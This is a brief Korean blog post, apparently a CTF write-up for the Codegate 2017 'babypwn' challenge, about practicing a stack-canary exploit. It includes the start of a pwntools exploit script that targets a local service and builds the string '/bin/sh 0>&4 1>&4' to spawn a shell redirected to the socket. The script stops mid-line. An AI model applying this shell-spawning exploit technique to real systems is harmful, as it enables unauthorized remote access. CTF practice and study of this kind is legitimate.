codegate 2017 - babypwn

Codegate 2017 - babypwn 문제입니다. 카나리 익스 연습하려고 추천해주셔서 풀어봤습니다.원격으로 서버열어서 쉘따는 부분이 0>&4 1>&4 입출력 다 원격으로 바꾸는게 신기했습니다. 물론 저부분은 도움없었으면 못풀었을거에요 ㅠ 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950from pwn import * r = remote('127.0.0.1',6666)e = ELF('./babypwn') bss = 0x0804b1b8+0x32binsh = "/bin/sh 0>&4 1>&4"system_plt = e.plt['system']recv_plt = e.plt['recv']pppp..

2018.09.20